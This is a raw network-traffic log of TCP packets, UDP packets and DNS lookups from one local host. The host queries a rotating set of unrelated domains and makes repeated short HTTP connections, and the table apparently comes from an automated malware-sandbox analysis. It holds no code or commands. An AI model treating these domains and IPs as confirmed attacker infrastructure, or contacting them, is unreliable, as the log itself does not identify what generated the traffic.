May 8, 2024 10:50:20.125317097 CEST	49729	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:20.436544895 CEST	80	49729	91.195.240.94	192.168.2.10
May 8, 2024 10:50:20.436670065 CEST	49729	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:20.438882113 CEST	49729	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:20.751082897 CEST	80	49729	91.195.240.94	192.168.2.10
May 8, 2024 10:50:20.751102924 CEST	80	49729	91.195.240.94	192.168.2.10
May 8, 2024 10:50:20.751938105 CEST	49729	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:21.947468996 CEST	49729	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:22.966743946 CEST	49730	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:23.278054953 CEST	80	49730	91.195.240.94	192.168.2.10
May 8, 2024 10:50:23.278148890 CEST	49730	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:23.280328989 CEST	49730	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:23.592092991 CEST	80	49730	91.195.240.94	192.168.2.10
May 8, 2024 10:50:23.592673063 CEST	80	49730	91.195.240.94	192.168.2.10
May 8, 2024 10:50:23.592686892 CEST	80	49730	91.195.240.94	192.168.2.10
May 8, 2024 10:50:23.597387075 CEST	49730	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:24.791305065 CEST	49730	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:26.515536070 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:26.826715946 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:26.826988935 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:26.828907967 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.180862904 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192311049 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192334890 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192343950 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192352057 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192363977 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192377090 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192385912 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192406893 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192415953 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.192418098 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192447901 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.192449093 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.192502022 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.503421068 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503509998 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503519058 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503528118 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503550053 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503557920 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503563881 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503566027 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.503578901 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:27.503592014 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.503622055 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.503712893 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.506146908 CEST	49731	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:27.817142963 CEST	80	49731	91.195.240.94	192.168.2.10
May 8, 2024 10:50:41.164963007 CEST	49732	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:41.364347935 CEST	80	49732	66.29.149.46	192.168.2.10
May 8, 2024 10:50:41.364455938 CEST	49732	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:41.366661072 CEST	49732	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:41.564822912 CEST	80	49732	66.29.149.46	192.168.2.10
May 8, 2024 10:50:41.581463099 CEST	80	49732	66.29.149.46	192.168.2.10
May 8, 2024 10:50:41.581475019 CEST	80	49732	66.29.149.46	192.168.2.10
May 8, 2024 10:50:41.581526995 CEST	49732	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:42.869427919 CEST	49732	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:44.652177095 CEST	49733	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:44.852257013 CEST	80	49733	66.29.149.46	192.168.2.10
May 8, 2024 10:50:44.852402925 CEST	49733	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:44.854578972 CEST	49733	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:45.053378105 CEST	80	49733	66.29.149.46	192.168.2.10
May 8, 2024 10:50:45.065354109 CEST	80	49733	66.29.149.46	192.168.2.10
May 8, 2024 10:50:45.065385103 CEST	80	49733	66.29.149.46	192.168.2.10
May 8, 2024 10:50:45.065459967 CEST	49733	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:46.369369030 CEST	49733	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:47.387846947 CEST	49734	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:47.586191893 CEST	80	49734	66.29.149.46	192.168.2.10
May 8, 2024 10:50:47.586327076 CEST	49734	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:47.588238001 CEST	49734	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:47.786566973 CEST	80	49734	66.29.149.46	192.168.2.10
May 8, 2024 10:50:47.799176931 CEST	80	49734	66.29.149.46	192.168.2.10
May 8, 2024 10:50:47.799206972 CEST	80	49734	66.29.149.46	192.168.2.10
May 8, 2024 10:50:47.799261093 CEST	49734	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:49.104131937 CEST	49734	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:50.123115063 CEST	49735	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:50.319411993 CEST	80	49735	66.29.149.46	192.168.2.10
May 8, 2024 10:50:50.319518089 CEST	49735	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:50.321676970 CEST	49735	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:50.517997026 CEST	80	49735	66.29.149.46	192.168.2.10
May 8, 2024 10:50:50.527709007 CEST	80	49735	66.29.149.46	192.168.2.10
May 8, 2024 10:50:50.527719021 CEST	80	49735	66.29.149.46	192.168.2.10
May 8, 2024 10:50:50.527853012 CEST	49735	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:50.530930996 CEST	49735	80	192.168.2.10	66.29.149.46
May 8, 2024 10:50:50.727195024 CEST	80	49735	66.29.149.46	192.168.2.10
May 8, 2024 10:50:56.221021891 CEST	49736	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:56.553674936 CEST	80	49736	195.110.124.133	192.168.2.10
May 8, 2024 10:50:56.553832054 CEST	49736	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:56.555685997 CEST	49736	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:56.890083075 CEST	80	49736	195.110.124.133	192.168.2.10
May 8, 2024 10:50:56.893878937 CEST	80	49736	195.110.124.133	192.168.2.10
May 8, 2024 10:50:56.894318104 CEST	80	49736	195.110.124.133	192.168.2.10
May 8, 2024 10:50:56.895517111 CEST	49736	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:58.056899071 CEST	49736	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:59.076423883 CEST	49737	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:59.415852070 CEST	80	49737	195.110.124.133	192.168.2.10
May 8, 2024 10:50:59.419765949 CEST	49737	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:59.425337076 CEST	49737	80	192.168.2.10	195.110.124.133
May 8, 2024 10:50:59.762542009 CEST	80	49737	195.110.124.133	192.168.2.10
May 8, 2024 10:50:59.765860081 CEST	80	49737	195.110.124.133	192.168.2.10
May 8, 2024 10:50:59.766236067 CEST	80	49737	195.110.124.133	192.168.2.10
May 8, 2024 10:50:59.766287088 CEST	49737	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:00.932050943 CEST	49737	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:03.127530098 CEST	49738	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:03.460443020 CEST	80	49738	195.110.124.133	192.168.2.10
May 8, 2024 10:51:03.460587978 CEST	49738	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:03.462506056 CEST	49738	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:03.794900894 CEST	80	49738	195.110.124.133	192.168.2.10
May 8, 2024 10:51:03.794997931 CEST	80	49738	195.110.124.133	192.168.2.10
May 8, 2024 10:51:03.799741983 CEST	80	49738	195.110.124.133	192.168.2.10
May 8, 2024 10:51:03.799850941 CEST	80	49738	195.110.124.133	192.168.2.10
May 8, 2024 10:51:03.799922943 CEST	49738	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:04.978766918 CEST	49738	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:05.997960091 CEST	49739	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:06.329932928 CEST	80	49739	195.110.124.133	192.168.2.10
May 8, 2024 10:51:06.330043077 CEST	49739	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:06.331902981 CEST	49739	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:06.663213968 CEST	80	49739	195.110.124.133	192.168.2.10
May 8, 2024 10:51:06.707916021 CEST	80	49739	195.110.124.133	192.168.2.10
May 8, 2024 10:51:06.708107948 CEST	80	49739	195.110.124.133	192.168.2.10
May 8, 2024 10:51:06.708199978 CEST	49739	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:06.713337898 CEST	49739	80	192.168.2.10	195.110.124.133
May 8, 2024 10:51:07.044953108 CEST	80	49739	195.110.124.133	192.168.2.10
May 8, 2024 10:51:11.994725943 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:12.157470942 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.157569885 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:12.185513973 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:12.348108053 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491338968 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491357088 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491369009 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491385937 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491394997 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491420984 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:12.491466045 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:12.491511106 CEST	80	49740	23.227.38.74	192.168.2.10
May 8, 2024 10:51:12.491559982 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:13.713193893 CEST	49740	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:14.733344078 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:14.896059036 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:14.896213055 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:14.901375055 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:15.064012051 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.254306078 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.254319906 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.254333973 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.254348040 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.254445076 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:15.254445076 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:15.254511118 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.254620075 CEST	80	49741	23.227.38.74	192.168.2.10
May 8, 2024 10:51:15.257442951 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:16.400661945 CEST	49741	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:17.419286966 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:17.581857920 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.583905935 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:17.587469101 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:17.750061989 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870626926 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870637894 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870645046 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870656967 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870667934 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870713949 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:17.870748043 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:17.870925903 CEST	80	49742	23.227.38.74	192.168.2.10
May 8, 2024 10:51:17.870995045 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:20.430967093 CEST	49742	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.435492039 CEST	49743	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.598001003 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:21.598756075 CEST	49743	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.600831985 CEST	49743	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.765593052 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:21.806546926 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:21.806560040 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:21.806575060 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:21.806591034 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:21.806768894 CEST	49743	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.806768894 CEST	49743	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.811537027 CEST	49743	80	192.168.2.10	23.227.38.74
May 8, 2024 10:51:21.976123095 CEST	80	49743	23.227.38.74	192.168.2.10
May 8, 2024 10:51:28.115674019 CEST	49744	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:28.278157949 CEST	80	49744	34.111.148.214	192.168.2.10
May 8, 2024 10:51:28.278352022 CEST	49744	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:28.280359983 CEST	49744	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:28.442781925 CEST	80	49744	34.111.148.214	192.168.2.10
May 8, 2024 10:51:28.584340096 CEST	80	49744	34.111.148.214	192.168.2.10
May 8, 2024 10:51:28.584357023 CEST	80	49744	34.111.148.214	192.168.2.10
May 8, 2024 10:51:28.584405899 CEST	49744	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:29.791296959 CEST	49744	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:30.809922934 CEST	49745	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:30.972785950 CEST	80	49745	34.111.148.214	192.168.2.10
May 8, 2024 10:51:30.973128080 CEST	49745	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:30.975128889 CEST	49745	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:31.137620926 CEST	80	49745	34.111.148.214	192.168.2.10
May 8, 2024 10:51:31.275866032 CEST	80	49745	34.111.148.214	192.168.2.10
May 8, 2024 10:51:31.275880098 CEST	80	49745	34.111.148.214	192.168.2.10
May 8, 2024 10:51:31.276011944 CEST	49745	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:32.478902102 CEST	49745	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:33.497221947 CEST	49746	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:33.659548998 CEST	80	49746	34.111.148.214	192.168.2.10
May 8, 2024 10:51:33.661602974 CEST	49746	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:33.665349007 CEST	49746	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:33.827569008 CEST	80	49746	34.111.148.214	192.168.2.10
May 8, 2024 10:51:33.827579975 CEST	80	49746	34.111.148.214	192.168.2.10
May 8, 2024 10:51:33.965671062 CEST	80	49746	34.111.148.214	192.168.2.10
May 8, 2024 10:51:33.965692997 CEST	80	49746	34.111.148.214	192.168.2.10
May 8, 2024 10:51:33.965747118 CEST	49746	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:35.167413950 CEST	49746	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:36.185141087 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:36.348155975 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.348346949 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:36.443835020 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:36.609791040 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.752778053 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.752791882 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.752808094 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.755511045 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:36.755567074 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.755585909 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.755589962 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.755616903 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:36.755691051 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:36.755691051 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:38.037508011 CEST	49747	80	192.168.2.10	34.111.148.214
May 8, 2024 10:51:38.201503038 CEST	80	49747	34.111.148.214	192.168.2.10
May 8, 2024 10:51:43.418311119 CEST	49748	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:43.625529051 CEST	80	49748	217.196.55.202	192.168.2.10
May 8, 2024 10:51:43.625606060 CEST	49748	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:43.627485991 CEST	49748	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:43.833576918 CEST	80	49748	217.196.55.202	192.168.2.10
May 8, 2024 10:51:43.833847046 CEST	80	49748	217.196.55.202	192.168.2.10
May 8, 2024 10:51:43.834199905 CEST	80	49748	217.196.55.202	192.168.2.10
May 8, 2024 10:51:43.841372967 CEST	49748	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:45.144674063 CEST	49748	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:46.153690100 CEST	49749	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:46.359750032 CEST	80	49749	217.196.55.202	192.168.2.10
May 8, 2024 10:51:46.359896898 CEST	49749	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:46.361790895 CEST	49749	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:46.567837000 CEST	80	49749	217.196.55.202	192.168.2.10
May 8, 2024 10:51:46.567851067 CEST	80	49749	217.196.55.202	192.168.2.10
May 8, 2024 10:51:46.568193913 CEST	80	49749	217.196.55.202	192.168.2.10
May 8, 2024 10:51:46.573446035 CEST	49749	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:47.871366024 CEST	49749	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:48.888458014 CEST	49750	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:49.094429016 CEST	80	49750	217.196.55.202	192.168.2.10
May 8, 2024 10:51:49.094532013 CEST	49750	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:49.096772909 CEST	49750	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:49.302840948 CEST	80	49750	217.196.55.202	192.168.2.10
May 8, 2024 10:51:49.303035021 CEST	80	49750	217.196.55.202	192.168.2.10
May 8, 2024 10:51:49.303353071 CEST	80	49750	217.196.55.202	192.168.2.10
May 8, 2024 10:51:49.303494930 CEST	49750	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:50.605360985 CEST	49750	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:51.623086929 CEST	49751	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:51.828986883 CEST	80	49751	217.196.55.202	192.168.2.10
May 8, 2024 10:51:51.829452991 CEST	49751	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:51.833359003 CEST	49751	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:52.040518045 CEST	80	49751	217.196.55.202	192.168.2.10
May 8, 2024 10:51:52.040632010 CEST	80	49751	217.196.55.202	192.168.2.10
May 8, 2024 10:51:52.040977955 CEST	80	49751	217.196.55.202	192.168.2.10
May 8, 2024 10:51:52.043509960 CEST	49751	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:52.044331074 CEST	49751	80	192.168.2.10	217.196.55.202
May 8, 2024 10:51:52.250127077 CEST	80	49751	217.196.55.202	192.168.2.10
May 8, 2024 10:51:57.411293030 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:51:58.416342020 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:00.416296005 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:04.419409037 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:12.416290045 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:19.435422897 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:20.447881937 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:22.447535038 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:26.463151932 CEST	49752	80	192.168.2.10	185.237.107.49
May 8, 2024 10:52:34.463176966 CEST	49752	80	192.168.2.10	185.237.107.49

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 8, 2024 10:48:59.896873951 CEST	63260	53	192.168.2.10	1.1.1.1
May 8, 2024 10:49:00.463779926 CEST	53	63260	1.1.1.1	192.168.2.10
May 8, 2024 10:49:16.169944048 CEST	57525	53	192.168.2.10	1.1.1.1
May 8, 2024 10:49:16.641871929 CEST	53	57525	1.1.1.1	192.168.2.10
May 8, 2024 10:49:30.713836908 CEST	54013	53	192.168.2.10	1.1.1.1
May 8, 2024 10:49:31.248903990 CEST	53	54013	1.1.1.1	192.168.2.10
May 8, 2024 10:49:45.825938940 CEST	64790	53	192.168.2.10	1.1.1.1
May 8, 2024 10:49:46.298698902 CEST	53	64790	1.1.1.1	192.168.2.10
May 8, 2024 10:50:00.482934952 CEST	61607	53	192.168.2.10	1.1.1.1
May 8, 2024 10:50:01.354851961 CEST	53	61607	1.1.1.1	192.168.2.10
May 8, 2024 10:50:17.105094910 CEST	53226	53	192.168.2.10	1.1.1.1
May 8, 2024 10:50:17.273443937 CEST	53	53226	1.1.1.1	192.168.2.10
May 8, 2024 10:50:32.513410091 CEST	53670	53	192.168.2.10	1.1.1.1
May 8, 2024 10:50:32.858745098 CEST	53	53670	1.1.1.1	192.168.2.10
May 8, 2024 10:50:40.926121950 CEST	60092	53	192.168.2.10	1.1.1.1
May 8, 2024 10:50:41.162220955 CEST	53	60092	1.1.1.1	192.168.2.10
May 8, 2024 10:50:55.547496080 CEST	53568	53	192.168.2.10	1.1.1.1
May 8, 2024 10:50:56.217941046 CEST	53	53568	1.1.1.1	192.168.2.10
May 8, 2024 10:51:11.717474937 CEST	60574	53	192.168.2.10	1.1.1.1
May 8, 2024 10:51:11.991306067 CEST	53	60574	1.1.1.1	192.168.2.10
May 8, 2024 10:51:26.827600956 CEST	54440	53	192.168.2.10	1.1.1.1
May 8, 2024 10:51:27.838325024 CEST	54440	53	192.168.2.10	1.1.1.1
May 8, 2024 10:51:28.112885952 CEST	53	54440	1.1.1.1	192.168.2.10
May 8, 2024 10:51:28.113032103 CEST	53	54440	1.1.1.1	192.168.2.10
May 8, 2024 10:51:43.046293020 CEST	64814	53	192.168.2.10	1.1.1.1
May 8, 2024 10:51:43.415055037 CEST	53	64814	1.1.1.1	192.168.2.10
May 8, 2024 10:51:57.061521053 CEST	62964	53	192.168.2.10	1.1.1.1
May 8, 2024 10:51:57.408304930 CEST	53	62964	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 8, 2024 10:48:59.896873951 CEST	192.168.2.10	1.1.1.1	0x8f11	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:49:16.169944048 CEST	192.168.2.10	1.1.1.1	0xe5a3	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
May 8, 2024 10:49:30.713836908 CEST	192.168.2.10	1.1.1.1	0x84e6	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:49:45.825938940 CEST	192.168.2.10	1.1.1.1	0xf20d	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:00.482934952 CEST	192.168.2.10	1.1.1.1	0xada4	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:17.105094910 CEST	192.168.2.10	1.1.1.1	0x1e80	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:32.513410091 CEST	192.168.2.10	1.1.1.1	0xad77	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:40.926121950 CEST	192.168.2.10	1.1.1.1	0x78d9	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:55.547496080 CEST	192.168.2.10	1.1.1.1	0x2bdf	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:11.717474937 CEST	192.168.2.10	1.1.1.1	0xc2a2	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:26.827600956 CEST	192.168.2.10	1.1.1.1	0xbd23	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:27.838325024 CEST	192.168.2.10	1.1.1.1	0xbd23	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:43.046293020 CEST	192.168.2.10	1.1.1.1	0xdea0	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:57.061521053 CEST	192.168.2.10	1.1.1.1	0x93	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 8, 2024 10:49:00.463779926 CEST	1.1.1.1	192.168.2.10	0x8f11	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
May 8, 2024 10:49:16.641871929 CEST	1.1.1.1	192.168.2.10	0xe5a3	No error (0)	www.kasegitai.tokyo		202.172.28.202	A (IP address)	IN (0x0001)	false
May 8, 2024 10:49:31.248903990 CEST	1.1.1.1	192.168.2.10	0x84e6	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
May 8, 2024 10:49:46.298698902 CEST	1.1.1.1	192.168.2.10	0xf20d	No error (0)	www.antonio-vivaldi.mobi		46.30.213.191	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:01.354851961 CEST	1.1.1.1	192.168.2.10	0xada4	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 10:50:01.354851961 CEST	1.1.1.1	192.168.2.10	0xada4	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 10:50:01.354851961 CEST	1.1.1.1	192.168.2.10	0xada4	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:17.273443937 CEST	1.1.1.1	192.168.2.10	0x1e80	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
